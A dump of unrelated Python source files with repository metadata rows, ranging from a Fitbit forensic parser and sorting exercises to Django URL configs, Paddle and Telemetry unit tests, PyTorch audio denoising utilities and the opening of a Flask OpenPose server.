''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
report = ArtifactHtmlReport('Fitbit Heart Rate Summary')
report.start_artifact_report(report_folder, 'Fitbit Heart Rate Summary')
report.add_script()
data_headers = ('Timestamp','Avg. Heart Rate','Resting Heart Rate')
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2]))
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = f'Fitbit Heart Rate Summary'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = f'Fitbit Heart Rate Summary'
timeline(report_folder, tlactivity, data_list, data_headers)
else:
logfunc('No Fitbit Heart Rate Summary data available')
db.close()
|
[
"abrignoni@gmail.com"
] |
abrignoni@gmail.com
|
9d3f1e1eaaf40864ef9e266b4fd7d25f9d328b21
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/mYGipMffRTYxYmv5i_3.py
|
1c5ebcf46c86f6f779f84e38b73917754d45490f
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,929
|
py
|
import itertools
def simple_equation(a,b,c):
numbers = [a,b,c]
for eachcombo in itertools.permutations(numbers,2):
first_num = eachcombo[0]
second_num = eachcombo[1]
if c != first_num and c != second_num:
if first_num + second_num == c:
return '{}+{}={}'.format(first_num,second_num,c)
elif first_num - second_num == c:
return '{}-{}={}'.format(first_num,second_num,c)
elif first_num * second_num == c:
return '{}*{}={}'.format(first_num,second_num,c)
try:
if first_num // second_num == c:
return '{}/{}={}'.format(first_num,second_num,c)
except Exception as e:
continue
elif b != first_num and b != second_num:
if first_num + second_num == b:
return '{}+{}={}'.format(first_num,second_num,b)
elif first_num - second_num == b:
return '{}-{}={}'.format(first_num,second_num,b)
elif first_num * second_num == b:
return '{}*{}={}'.format(first_num,second_num,b)
try:
if first_num // second_num == b:
return '{}/{}={}'.format(first_num,second_num,b)
except Exception as e:
continue
elif a != first_num and a != second_num:
if first_num + second_num == a:
return '{}+{}={}'.format(first_num,second_num,a)
elif first_num - second_num == a:
return '{}-{}={}'.format(first_num,second_num,a)
elif first_num * second_num == a:
return '{}*{}={}'.format(first_num,second_num,a)
try:
if first_num // second_num == a:
return '{}/{}={}'.format(first_num,second_num,a)
except Exception as e:
continue
return ''
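# A compact sketch of the same search (illustrative, not from the original:
# tries every ordering of the three numbers with +, -, * and integer division,
# mirroring the original's use of //; tie-breaking order may differ).
import operator

def simple_equation_compact(a, b, c):
    ops = [('+', operator.add), ('-', operator.sub),
           ('*', operator.mul), ('/', operator.floordiv)]
    for x, y, z in itertools.permutations([a, b, c]):
        for symbol, func in ops:
            try:
                if func(x, y) == z:
                    return '{}{}{}={}'.format(x, symbol, y, z)
            except ZeroDivisionError:
                continue
    return ''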
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f71f89c4c19d7d8045d9c586cb80e5b3176cf92f
|
ec53949dafa4b6ad675d679b05ed7c83fef2c69a
|
/DataStructuresAndAlgo/SortAlgo/QuickSort/QuickSort.py
|
ec6d49ec37082d18b789ab13db62a63fe2db4d61
|
[] |
no_license
|
tpotjj/Python
|
9a5a20a53cd7a6ec14386c1db8ce155e0fc9ab8a
|
ca73c116ada4d05c0c565508163557744c86fc76
|
refs/heads/master
| 2023-07-11T16:37:10.039522
| 2021-08-14T11:17:55
| 2021-08-14T11:17:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
def partition(CustomList, low, high):
    # Lomuto partition scheme: take the last element as the pivot and move
    # every element <= pivot to its left.
    i = low - 1
    pivot = CustomList[high]
    for j in range(low, high):
        if CustomList[j] <= pivot:
            i += 1
            CustomList[i], CustomList[j] = CustomList[j], CustomList[i]
    # Place the pivot just after the last smaller element and return its index.
    CustomList[i + 1], CustomList[high] = CustomList[high], CustomList[i + 1]
    return i + 1

def Quicksort(CustomList, low, high):
    # Recursively sort the halves on either side of the pivot, in place.
    if low < high:
        pi = partition(CustomList, low, high)
        Quicksort(CustomList, low, pi - 1)
        Quicksort(CustomList, pi + 1, high)

BasicList = [2, 6, 4, 8, 1, 3]
print(BasicList)
Quicksort(BasicList, 0, len(BasicList) - 1)
print(BasicList)
|
[
"joris97jansen@gmail.com"
] |
joris97jansen@gmail.com
|
f155e40ab83b0e0703d0bfe760ae2c41de4fcdb7
|
e5e9ee9e4db2e400e7f87647501ee412c13d76e5
|
/python/python-base/turtle/fun.py
|
5cab82c491cf1fee60b9d184422b03d78cfa699e
|
[] |
no_license
|
beingveera/whole-python
|
524441eec44379c36cb1cfeccdbc65bf1c15d2f6
|
3f2b3cb7528afb9605ab6f9d4d2efc856a247af5
|
refs/heads/main
| 2023-05-15T06:28:03.058105
| 2021-06-05T09:37:47
| 2021-06-05T09:37:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
import turtle as t
t.fd(1000)
t.setposition(200,-490)
t.clear()
t.speed(0.1)
t.circle(-50)
t.tracer(1,3)
t.color('blue')
t.pensize(10)
t.circle(20)
|
[
"sharma.lokesh.222001@gmail.com"
] |
sharma.lokesh.222001@gmail.com
|
dcec9dfe44d580ff70c968b38dcb5e9e06fac39d
|
eb57e632fb351db1975ad0e15bd480759bbc153b
|
/sysinf/urls.py
|
3c44a5f757052a14c4ca9c32626da21663101d8a
|
[
"MIT"
] |
permissive
|
raikel/dnfas
|
163ebc59fc6d4a12c044de33136cdce7ed7ddf0e
|
567bcc6656c75ee5167bd248045ec24e37de07b8
|
refs/heads/master
| 2021-06-27T02:22:30.508109
| 2020-03-25T20:11:04
| 2020-03-25T20:11:04
| 224,517,088
| 0
| 0
|
MIT
| 2021-03-19T22:52:15
| 2019-11-27T21:07:07
|
Python
|
UTF-8
|
Python
| false
| false
| 167
|
py
|
from django.urls import path
from .views import SystemStatsView
app_name = 'sysinf'
urlpatterns = [
path('system/', SystemStatsView.as_view(), name='system')
]
|
[
"raikelbl@gmail.com"
] |
raikelbl@gmail.com
|
8348e16c6785697fe7de5e82d5b2cccf17d8a39d
|
56231e5b77a8b743e84e43d28691da36b89a0cca
|
/platform-tools/systrace/catapult/telemetry/telemetry/testing/run_tests_unittest.py
|
8728813fb8ee52fb77629c0039869526582c60cf
|
[
"MIT",
"LicenseRef-scancode-proprietary-license",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
cricketclubucd/davisdragons
|
ee3aa6ad72197c2218660843e03d58c562b965aa
|
99d5877377b80d1b20c78cc3c4c6f26795f29b14
|
refs/heads/master
| 2023-01-30T05:37:45.923195
| 2021-01-27T06:30:25
| 2021-01-27T06:30:25
| 96,661,120
| 2
| 2
|
MIT
| 2023-01-23T18:42:26
| 2017-07-09T04:32:10
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,762
|
py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import util
from telemetry.testing import run_tests
class MockArgs(object):
def __init__(self):
self.positional_args = []
self.exact_test_filter = True
self.run_disabled_tests = False
self.skip = []
class MockPossibleBrowser(object):
def __init__(self, browser_type, os_name, os_version_name,
supports_tab_control):
self.browser_type = browser_type
self.platform = MockPlatform(os_name, os_version_name)
self.supports_tab_control = supports_tab_control
class MockPlatform(object):
def __init__(self, os_name, os_version_name):
self.os_name = os_name
self.os_version_name = os_version_name
def GetOSName(self):
return self.os_name
def GetOSVersionName(self):
return self.os_version_name
class RunTestsUnitTest(unittest.TestCase):
def _GetEnabledTests(self, browser_type, os_name, os_version_name,
supports_tab_control, args=None):
if not args:
args = MockArgs()
runner = run_tests.typ.Runner()
host = runner.host
runner.top_level_dir = util.GetTelemetryDir()
runner.args.tests = [host.join(util.GetTelemetryDir(),
'telemetry', 'testing', 'disabled_cases.py')]
possible_browser = MockPossibleBrowser(
browser_type, os_name, os_version_name, supports_tab_control)
runner.classifier = run_tests.GetClassifier(args, possible_browser)
_, test_set = runner.find_tests(runner.args)
return set(test.name.split('.')[-1] for test in test_set.parallel_tests)
def testSystemMacMavericks(self):
self.assertEquals(
set(['testAllEnabled',
'testMacOnly',
'testMavericksOnly',
'testNoChromeOS',
'testNoWinLinux',
'testSystemOnly',
'testHasTabs']),
self._GetEnabledTests('system', 'mac', 'mavericks', True))
def testSystemMacLion(self):
self.assertEquals(
set(['testAllEnabled',
'testMacOnly',
'testNoChromeOS',
'testNoMavericks',
'testNoWinLinux',
'testSystemOnly',
'testHasTabs']),
self._GetEnabledTests('system', 'mac', 'lion', True))
def testCrosGuestChromeOS(self):
self.assertEquals(
set(['testAllEnabled',
'testChromeOSOnly',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testNoWinLinux',
'testHasTabs']),
self._GetEnabledTests('cros-guest', 'chromeos', '', True))
def testCanaryWindowsWin7(self):
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testWinOrLinuxOnly',
'testHasTabs']),
self._GetEnabledTests('canary', 'win', 'win7', True))
def testDoesntHaveTabs(self):
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testNoMac',
'testNoMavericks',
'testNoSystem',
'testWinOrLinuxOnly']),
self._GetEnabledTests('canary', 'win', 'win7', False))
def testSkip(self):
args = MockArgs()
args.skip = ['telemetry.*testNoMac', '*NoMavericks',
'telemetry.testing.disabled_cases.DisabledCases.testNoSystem']
self.assertEquals(
set(['testAllEnabled',
'testNoChromeOS',
'testWinOrLinuxOnly',
'testHasTabs']),
self._GetEnabledTests('canary', 'win', 'win7', True, args))
|
[
"jena.suraj.k@gmail.com"
] |
jena.suraj.k@gmail.com
|
bb1db72e1417f503a51c53cab45015887b5df63a
|
8ba041911be24ba453d6df60ddf47e7d2aedfde5
|
/model.py
|
ff354766fccfa1efd6fe85425ef183d0be6f6c83
|
[] |
no_license
|
dmcdekker/testing-1
|
9c0beda3fbdb9d37a812e903800f4c976cd0bbae
|
ee6cbab6aec40adde9971005d9c79862fb3bfe7a
|
refs/heads/master
| 2020-03-15T14:07:38.046358
| 2018-05-04T19:58:29
| 2018-05-04T19:58:29
| 132,183,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
from flask_sqlalchemy import SQLAlchemy  # flask.ext.* imports were removed in Flask 1.0
db = SQLAlchemy()
class Game(db.Model):
"""Board game."""
__tablename__ = "games"
game_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(20), nullable=False, unique=True)
description = db.Column(db.String(100))
def connect_to_db(app, db_uri="postgresql:///games"):
app.config['SQLALCHEMY_DATABASE_URI'] = db_uri
db.app = app
db.init_app(app)
def example_data():
"""Create example data for the test database."""
#FIXME: write a function that creates a game and adds it to the database.
game1 = Game(name="My Little Pony", description="A pony game")
game2 = Game(name="Good or Evil", description="Are you good or evil?!")
db.session.add_all([game1, game2])
db.session.commit()
if __name__ == '__main__':
from server import app
connect_to_db(app)
print "Connected to DB."
|
[
"no-reply@hackbrightacademy.com"
] |
no-reply@hackbrightacademy.com
|
0b1cde1c5f80af4837b8282ef80c77174dc1c5e7
|
12f18662719d04d2404396b9059b60525528f557
|
/findsportsordermanagement-master/purchaseorder/migrations/0018_purchaseorder_internal_notes.py
|
45c5291a9d14c87910376425849d88f1c857c904
|
[] |
no_license
|
ujjalgoswami/ordermanagementcustomdashboard
|
0bf4a5770d1913b257a43858d778e630e671a342
|
acd18510b0934601d30bd717ea4b3fbb61ecfb5c
|
refs/heads/master
| 2021-02-04T10:04:27.380674
| 2020-02-28T01:37:35
| 2020-02-28T01:37:35
| 243,653,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
# Generated by Django 2.2.4 on 2019-12-10 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('purchaseorder', '0017_orderline_reorder'),
]
operations = [
migrations.AddField(
model_name='purchaseorder',
name='internal_notes',
field=models.TextField(null=True),
),
]
|
[
"ujjalgoswami92@gmail.com"
] |
ujjalgoswami92@gmail.com
|
667a27f91a5feffa45b0df3b9f4c79d54a94be94
|
af93b3909f86ab2d310a8fa81c9357d87fdd8a64
|
/begginer/5. cas/zadatak5.py
|
f27bd47d532b65caf07d06877073feb078f9bbcb
|
[] |
no_license
|
BiljanaPavlovic/pajton-kurs
|
8cf15d443c9cca38f627e44d764106ef0cc5cd98
|
93092e6e945b33116ca65796570462edccfcbcb0
|
refs/heads/master
| 2021-05-24T14:09:57.536994
| 2020-08-02T15:00:12
| 2020-08-02T15:00:12
| 253,597,402
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
unos=input("Unesite stranice a i b:")
stranice=unos.split(" ")
obim=2*float(stranice[0])+2*float(stranice[1])
povrsina=float(stranice[0])*float(stranice[1])
print("O= ",obim)
print("P=",povrsina)
|
[
"zabiljanupavlovic@gmail.com"
] |
zabiljanupavlovic@gmail.com
|
99e4e4ca7bb40a4fc37e65d4d6c65b0a7d078685
|
b9d75e3e37d08262321b0dc726639fc25f152caa
|
/utils.py
|
cc49eb7b6a45ee027cefe48ead6e43e9a20dab51
|
[] |
no_license
|
G-Wang/pytorch_FFTNet
|
a2712763ae7ee2fff9d002c931593987d6e25060
|
b96486f6823e762e71c2e299739b925081e5bacf
|
refs/heads/master
| 2020-04-08T22:14:18.563719
| 2018-08-31T07:38:21
| 2018-08-31T07:38:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,463
|
py
|
import numpy as np
import torch
from torch.nn import functional as F
from scipy.special import expn
from torchaudio.transforms import MuLawEncoding, MuLawExpanding
def encoder(quantization_channels):
return MuLawEncoding(quantization_channels)
def decoder(quantization_channels):
return MuLawExpanding(quantization_channels)
def np_mulaw(x, quantization_channels):
mu = quantization_channels - 1
x_mu = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)
return x_mu
def np_inv_mulaw(x, quantization_channels):
mu = quantization_channels - 1
x = np.sign(x) * (np.exp(np.abs(x) * np.log1p(mu)) - 1.) / mu
return x
def float2class(x, classes):
mu = classes - 1
return np.rint((x + 1) / 2 * mu).astype(int)
def class2float(x, classes):
mu = classes - 1
return x.astype(float) / mu * 2 - 1.
def zero_padding(x, maxlen, dim=0):
diff = maxlen - x.shape[dim]
if diff <= 0:
return x
else:
pad_shape = ()
for i in range(len(x.shape)):
if i != dim:
pad_shape += ((0, 0),)
else:
pad_shape += ((0, diff),)
return np.pad(x, pad_shape, 'constant')
def repeat_last_padding(x, maxlen):
diff = maxlen - x.shape[-1]
if diff <= 0:
return x
else:
pad_value = np.tile(x[..., [-1]], diff)
return np.concatenate((x, pad_value), axis=-1)
# This function is adapted from https://github.com/braindead/logmmse/blob/master/logmmse.py
# (numpy arrays replaced with torch tensors)
def logmmse(x, sr, noise_std=1 / 256):
window_size = int(0.02 * sr)
if window_size % 2 == 1:
window_size += 1
# noverlap = len1; hop_size = len2; window_size = len
noverlap = int(window_size * 0.75)
hop_size = window_size - noverlap
win = torch.hann_window(window_size)
win *= hop_size / win.sum()
nfft = 2 ** (window_size - 1).bit_length()
pad_pos = (nfft - window_size) // 2
noise = torch.randn(6, window_size) * noise_std
noise_fft = torch.rfft(F.pad(win * noise, (pad_pos, pad_pos)), 1)
noise_mean = noise_fft.pow(2).sum(-1).sqrt()
noise_mu = noise_mean.mean(0)
noise_mu2 = noise_mu.pow(2)
spec = torch.stft(x, nfft, hop_length=hop_size, win_length=window_size, window=win, center=False)
spec_copy = spec.clone()
sig2 = spec.pow(2).sum(-1)
vad_curve = vad(x, S=spec).float()
aa = 0.98
ksi_min = 10 ** (-25 / 10)
gammak = torch.min(sig2 / noise_mu2.unsqueeze(-1), torch.Tensor([40]))
for n in range(spec.size(1)):
gammak_n = gammak[:, n]
if n == 0:
ksi = aa + (1 - aa) * F.relu(gammak_n - 1)
else:
ksi = aa * spec_copy[:, n - 1].pow(2).sum(-1) / noise_mu2 + (1 - aa) * F.relu(gammak_n - 1)
ksi = torch.max(ksi, torch.Tensor([ksi_min]))
A = ksi / (1 + ksi)
vk = A * gammak_n
ei_vk = 0.5 * expint(vk)
hw = A * ei_vk.exp()
spec_copy[:, n] *= hw.unsqueeze(-1)
xi_w = torch.irfft(spec_copy.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
origin = torch.irfft(spec.transpose(0, 1), 1, signal_sizes=torch.Size([nfft]))[:, pad_pos:-pad_pos]
xi_w_mask = vad_curve / 2 + 0.5
orign_mask = (1 - vad_curve) / 2
final_framed = xi_w * xi_w_mask.unsqueeze(-1) + origin * orign_mask.unsqueeze(-1)
xfinal = torch.zeros(final_framed.size(0) * hop_size + noverlap)
k = 0
for n in range(final_framed.size(0)):
xfinal[k:k + window_size] += final_framed[n]
k += hop_size
return xfinal
def expint(x):
x = x.detach().cpu().numpy()
x = expn(1, x)
return torch.from_numpy(x).float()
def vad(x, hop_size=256, S=None, k=5, med_num=9):
if S is None:
S = torch.stft(x, hop_size * 4, hop_length=hop_size)
energy = S.pow(2).sum(-1).mean(0).sqrt()
energy /= energy.max()
sorted_E, _ = energy.sort()
sorted_E_d = sorted_E[2:] - sorted_E[:-2]
smoothed = F.pad(sorted_E_d, (7, 7)).unfold(0, 15, 1).mean(-1)
sorted_E_d_peak = F.relu(smoothed[1:-1] - smoothed[:-2]) * F.relu(smoothed[1:-1] - smoothed[2:])
first, *dummy = torch.nonzero(sorted_E_d_peak) + 2
E_th = sorted_E[:first].mean() * k
decision = torch.gt(energy, E_th)
pad = (med_num // 2, med_num // 2)
decision = F.pad(decision, pad)
decision = decision.unfold(0, med_num, 1)
decision, _ = decision.median(dim=-1)
return decision
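# Minimal usage sketch (the filename is illustrative; assumes a mono wav file
# and the torch/torchaudio versions this module targets):
if __name__ == '__main__':
    import torchaudio
    waveform, sample_rate = torchaudio.load('speech.wav')
    denoised = logmmse(waveform[0], sample_rate)
    torchaudio.save('speech_denoised.wav', denoised.unsqueeze(0), sample_rate)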
|
[
"ya70201@gmail.com"
] |
ya70201@gmail.com
|
7943c82bfb5eef6a125f551f9bf92c8ed87f9028
|
7da0e8d03548ec83ec717a076add2199e543e3dd
|
/InvenTree/part/urls.py
|
75d5041b9c89cb54a2d092a2a95eaf92b5418bb4
|
[
"MIT"
] |
permissive
|
Devarshi87/InvenTree
|
7b90cbf14699861436ab127b9b7638cee81e30c4
|
2191b7f71972d4c3ba7322cc93936801a168ab3c
|
refs/heads/master
| 2020-05-15T04:25:03.289794
| 2019-04-18T12:42:36
| 2019-04-18T12:42:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,522
|
py
|
from django.conf.urls import url, include
from . import views
supplier_part_detail_urls = [
url(r'edit/?', views.SupplierPartEdit.as_view(), name='supplier-part-edit'),
url(r'delete/?', views.SupplierPartDelete.as_view(), name='supplier-part-delete'),
url('^.*$', views.SupplierPartDetail.as_view(), name='supplier-part-detail'),
]
supplier_part_urls = [
url(r'^new/?', views.SupplierPartCreate.as_view(), name='supplier-part-create'),
url(r'^(?P<pk>\d+)/', include(supplier_part_detail_urls)),
]
part_detail_urls = [
url(r'^edit/?', views.PartEdit.as_view(), name='part-edit'),
url(r'^delete/?', views.PartDelete.as_view(), name='part-delete'),
url(r'^track/?', views.PartDetail.as_view(template_name='part/track.html'), name='part-track'),
url(r'^bom-export/?', views.BomDownload.as_view(), name='bom-export'),
url(r'^bom/?', views.PartDetail.as_view(template_name='part/bom.html'), name='part-bom'),
url(r'^build/?', views.PartDetail.as_view(template_name='part/build.html'), name='part-build'),
url(r'^stock/?', views.PartDetail.as_view(template_name='part/stock.html'), name='part-stock'),
url(r'^used/?', views.PartDetail.as_view(template_name='part/used_in.html'), name='part-used-in'),
url(r'^allocation/?', views.PartDetail.as_view(template_name='part/allocation.html'), name='part-allocation'),
url(r'^suppliers/?', views.PartDetail.as_view(template_name='part/supplier.html'), name='part-suppliers'),
url(r'^thumbnail/?', views.PartImage.as_view(), name='part-image'),
# Any other URLs go to the part detail page
url(r'^.*$', views.PartDetail.as_view(), name='part-detail'),
]
part_category_urls = [
url(r'^edit/?', views.CategoryEdit.as_view(), name='category-edit'),
url(r'^delete/?', views.CategoryDelete.as_view(), name='category-delete'),
url('^.*$', views.CategoryDetail.as_view(), name='category-detail'),
]
part_bom_urls = [
url(r'^edit/?', views.BomItemEdit.as_view(), name='bom-item-edit'),
url('^delete/?', views.BomItemDelete.as_view(), name='bom-item-delete'),
url(r'^.*$', views.BomItemDetail.as_view(), name='bom-item-detail'),
]
# URL list for part web interface
part_urls = [
# Create a new category
url(r'^category/new/?', views.CategoryCreate.as_view(), name='category-create'),
# Create a new part
url(r'^new/?', views.PartCreate.as_view(), name='part-create'),
# Create a new BOM item
url(r'^bom/new/?', views.BomItemCreate.as_view(), name='bom-item-create'),
# Individual part
url(r'^(?P<pk>\d+)/', include(part_detail_urls)),
# Part category
url(r'^category/(?P<pk>\d+)/', include(part_category_urls)),
url(r'^bom/(?P<pk>\d+)/', include(part_bom_urls)),
# Top level part list (display top level parts and categories)
url(r'^.*$', views.PartIndex.as_view(), name='part-index'),
]
"""
part_param_urls = [
# Detail of a single part parameter
url(r'^(?P<pk>[0-9]+)/?$', views.PartParamDetail.as_view(), name='partparameter-detail'),
# Parameters associated with a particular part
url(r'^\?.*/?$', views.PartParamList.as_view()),
url(r'^$', views.PartParamList.as_view()),
]
part_param_template_urls = [
# Detail of a single part field template
url(r'^(?P<pk>[0-9]+)/?$', views.PartTemplateDetail.as_view(), name='partparametertemplate-detail'),
# List all part field templates
url(r'^\?.*/?$', views.PartTemplateList.as_view()),
url(r'^$', views.PartTemplateList.as_view())
]
"""
|
[
"oliver.henry.walters@gmail.com"
] |
oliver.henry.walters@gmail.com
|
48fdd9fa5aba23d7bfbf4bd119d4bcc4a83a85a2
|
35d62f3ccf1c422b13b313c4e519a5ce335e934d
|
/leetcode/jewelsAndStones.py
|
cc1e31157da05da0b2095b9c498ceeb4b90ee203
|
[] |
no_license
|
malaybiswal/python
|
357a074889299effe6a5fa2f1cd9c50ca35652d0
|
684d24d719b785725e736671faf2681232ecc394
|
refs/heads/master
| 2020-05-17T22:25:43.043929
| 2019-05-08T23:41:19
| 2019-05-08T23:41:19
| 183,999,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
#https://leetcode.com/problems/jewels-and-stones/
def numJewelsInStones(J, S):
c=0
for x in J:
for y in S:
if(x==y):
c+=1
return c
x="zz"
y="ZZZ"
print(numJewelsInStones(x,y))
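# A more idiomatic equivalent (a sketch): build a set of jewels once so each
# stone lookup is O(1) instead of scanning J.
def numJewelsInStones_set(J, S):
    jewels = set(J)
    return sum(stone in jewels for stone in S)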
|
[
"malay.biswal@rackspace.com"
] |
malay.biswal@rackspace.com
|
516e7adfdc21f38790c5bfe5706d14864c96eaab
|
3cd8bdcda9d0e549df184a5d9085ed8f5a86145d
|
/defining_classes/to_do_list/project/task.py
|
ad5910ea22a5b8855a43873b237cf5c1d554e494
|
[] |
no_license
|
ivklisurova/SoftUni_Python_OOP
|
bbec8a5d0d8c2c3f536dd2a92e9187aa39121692
|
59e2080b4eb0826a62a020ea3368a0bac6f644be
|
refs/heads/master
| 2022-11-29T00:09:40.488544
| 2020-08-05T19:55:27
| 2020-08-05T19:55:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 962
|
py
|
class Task:
def __init__(self, name, due_date):
self.name = name
self.due_date = due_date
self.comments = []
self.completed = False
def change_name(self, new_name: str):
if new_name == self.name:
return 'Name cannot be the same.'
self.name = new_name
return self.name
def change_due_date(self, new_date: str):
if new_date == self.due_date:
return 'Date cannot be the same.'
self.due_date = new_date
return self.due_date
def add_comment(self, comment: str):
self.comments.append(comment)
def edit_comment(self, comment_number: int, new_comment: str):
if comment_number >= len(self.comments):
return 'Cannot find comment.'
self.comments[comment_number] = new_comment
return f'{", ".join(self.comments)}'
def details(self):
return f'Name: {self.name} - Due Date: {self.due_date}'
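# Minimal usage sketch (values are illustrative, not part of the original module):
if __name__ == '__main__':
    task = Task('Write report', '2020-08-10')
    task.add_comment('Gather data first')
    task.edit_comment(0, 'Gather data, then draft')
    print(task.details())  # Name: Write report - Due Date: 2020-08-10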
|
[
"55747390+ivklisurova@users.noreply.github.com"
] |
55747390+ivklisurova@users.noreply.github.com
|
e7b3c28e67c42c208b0778ca9b4afdfddfd18a79
|
706518f154812af56f8fc91a71cd65d9667d9ed0
|
/python/paddle/fluid/tests/unittests/test_device.py
|
08697a080445e606f17bdde83384eef391713721
|
[
"Apache-2.0"
] |
permissive
|
andreazanetti/Paddle
|
3ea464703d67963134ffc6828f364412adb03fce
|
a259076dd01801e2e619237da02235a4856a96bb
|
refs/heads/develop
| 2023-04-25T08:30:43.751734
| 2021-05-05T01:31:44
| 2021-05-05T01:31:44
| 263,870,069
| 0
| 2
|
Apache-2.0
| 2020-07-07T10:45:08
| 2020-05-14T09:22:07
| null |
UTF-8
|
Python
| false
| false
| 3,379
|
py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle
import paddle.fluid as fluid
import paddle.fluid.core as core
import paddle.fluid.framework as framework
class TestStaticDeviceManage(unittest.TestCase):
def _test_device(self, device_name, device_class):
paddle.set_device(device_name)
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
exe = paddle.static.Executor()
exe.run(paddle.fluid.default_startup_program())
res = exe.run(fetch_list=[out3])
device = paddle.get_device()
self.assertEqual(isinstance(exe.place, device_class), True)
self.assertEqual(device, device_name)
def test_cpu_device(self):
self._test_device("cpu", core.CPUPlace)
def test_gpu_device(self):
if core.is_compiled_with_cuda():
self._test_device("gpu:0", core.CUDAPlace)
def test_xpu_device(self):
if core.is_compiled_with_xpu():
self._test_device("xpu:0", core.XPUPlace)
class TestImperativeDeviceManage(unittest.TestCase):
def test_cpu(self):
with fluid.dygraph.guard():
paddle.set_device('cpu')
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(), core.CPUPlace),
True)
self.assertEqual(device, "cpu")
def test_gpu(self):
if core.is_compiled_with_cuda():
with fluid.dygraph.guard():
paddle.set_device('gpu:0')
out1 = paddle.zeros(shape=[1, 3], dtype='float32')
out2 = paddle.ones(shape=[1, 3], dtype='float32')
out3 = paddle.concat(x=[out1, out2], axis=0)
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(),
core.CUDAPlace), True)
self.assertEqual(device, "gpu:0")
def test_xpu(self):
if core.is_compiled_with_xpu():
with fluid.dygraph.guard():
out = paddle.to_tensor([1, 2])
device = paddle.get_device()
self.assertEqual(
isinstance(framework._current_expected_place(),
core.XPUPlace), True)
self.assertTrue(out.place.is_xpu_place())
self.assertEqual(device, "xpu:0")
if __name__ == '__main__':
unittest.main()
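# A standalone sketch of the device-management API exercised by these tests
# (assumes a CPU-only Paddle 2.x install; run as its own script):
#   import paddle
#   paddle.set_device('cpu')    # select the global device
#   x = paddle.ones(shape=[1, 3], dtype='float32')
#   print(paddle.get_device())  # prints 'cpu'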
|
[
"noreply@github.com"
] |
andreazanetti.noreply@github.com
|
67056ff3f3511beb22ed46e346b3d52b30d40eed
|
cc1cd104b4b383e7807e75e2fb0a8e84e5fcf7df
|
/api_server/openpose_wrapper/openpose_server/app.py
|
491381120447d9b6e7f8461f4eb89313c620e8c9
|
[] |
no_license
|
Sam1224/OutfitApp-AWS
|
b9884d40945d2076f2135c0d2d75cf938161af9f
|
6c1b4d1e5c328c5d22b8f055d41a57ec2e9b921e
|
refs/heads/master
| 2022-04-24T11:50:24.506423
| 2020-04-29T11:03:43
| 2020-04-29T11:03:43
| 257,340,558
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,164
|
py
|
# coding=utf-8
import os
import sys
import argparse
import json
from PIL import Image
import cv2
import numpy as np
import itertools
# flask
import flask
#from flask import Flask, render_template, request, jsonify
# openpose python API
sys.path.append('../openpose_gpu/build/python')
from openpose import pyopenpose as op
# Custom modules
from utils import conv_base64_to_pillow, conv_base64_to_cv, conv_pillow_to_base64
#======================
# Global variables
#======================
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = False # keep non-ASCII (Japanese) characters readable in JSON responses
app.config["JSON_SORT_KEYS"] = False # preserve key order (disable sorting)
OPENPOSE_MODE_DIR_PATH = "../openpose_gpu/models/"
#================================================================
# "http://host_ip:5010" リクエスト送信時の処理
#================================================================
@app.route('/')
def index():
print( "リクエスト受け取り" )
return
#================================================================
# "http://host_ip:5010/openpose" にリクエスト送信時の処理
#================================================================
